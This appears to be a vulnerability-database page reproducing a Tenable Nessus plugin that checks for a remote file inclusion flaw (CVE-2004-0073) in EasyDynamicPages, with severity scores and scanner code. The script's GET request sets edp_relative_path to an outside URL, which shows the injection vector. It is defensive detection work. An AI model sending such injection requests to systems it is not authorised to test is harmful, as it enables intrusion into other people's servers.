Lucene search

K
nessusThis script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.EASYDYNAMICPAGES_CODE_INJECTION.NASL
HistoryJan 02, 2004 - 12:00 a.m.

EasyDynamicPages Multiple Script edp_relative_path Parameter Remote File Inclusion

2004-01-0200:00:00
This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
16

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS

0.066

Percentile

93.8%

The remote host is running EasyDynamicPages, a set of PHP scripts designed to help web publication.

It is possible with this suite to make the remote host include PHP files hosted on a third-party server. An attacker may use this flaw to inject arbitrary code in the remote host and gain a shell with the privileges of the web server.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

# Ref:
#  To: BugTraq
#  Subject: include() vuln in EasyDynamicPages v.2.0
#  Date: Jan 2 2004 3:18PM
#  Author: Vietnamese Security Group <security security com vn>
#  Message-ID: <[email protected]>


include('deprecated_nasl_level.inc');
include('compat.inc');

if(description)
{
  script_id(11976);
  script_version("1.24");

  script_cve_id("CVE-2004-0073");
  script_bugtraq_id(9338);

  script_name(english:"EasyDynamicPages Multiple Script edp_relative_path Parameter Remote File Inclusion");
  script_summary(english:"Checks for the presence of EasyDynamicPages");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is affected by a
remote file include vulnerability." );
  script_set_attribute(attribute:"description", value:
"The remote host is running EasyDynamicPages, a set of PHP scripts
designed to help web publication.

It is possible with this suite to make the remote host include PHP
files hosted on a third-party server.  An attacker may use this flaw
to inject arbitrary code in the remote host and gain a shell with the
privileges of the web server." );
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2004/Jan/12" );
  script_set_attribute(attribute:"solution", value:
"Unknown at this time." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:W/RC:ND");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:W/RC:X");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2004-0073");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"plugin_publication_date", value: "2004/01/02");
  script_set_attribute(attribute:"vuln_publication_date", value: "2004/01/02");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_copyright(english:"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"CGI abuses");
  
  script_dependencie("find_service1.nasl", "http_version.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_keys("www/PHP");
  exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80);
if(!can_host_php(port:port)) exit(0);



foreach dir (cgi_dirs())
 {
  w = http_send_recv3(method:"GET", item:string(dir, "/dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http://example.com/"),
 		port:port);
 if (isnull(w)) exit(0);
 r = w[2];

 if("http://example.com/admin/site_settings.php" >< r)
  {
 	security_hole(port);
	exit(0);
  }
}

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS

0.066

Percentile

93.8%

Related for EASYDYNAMICPAGES_CODE_INJECTION.NASL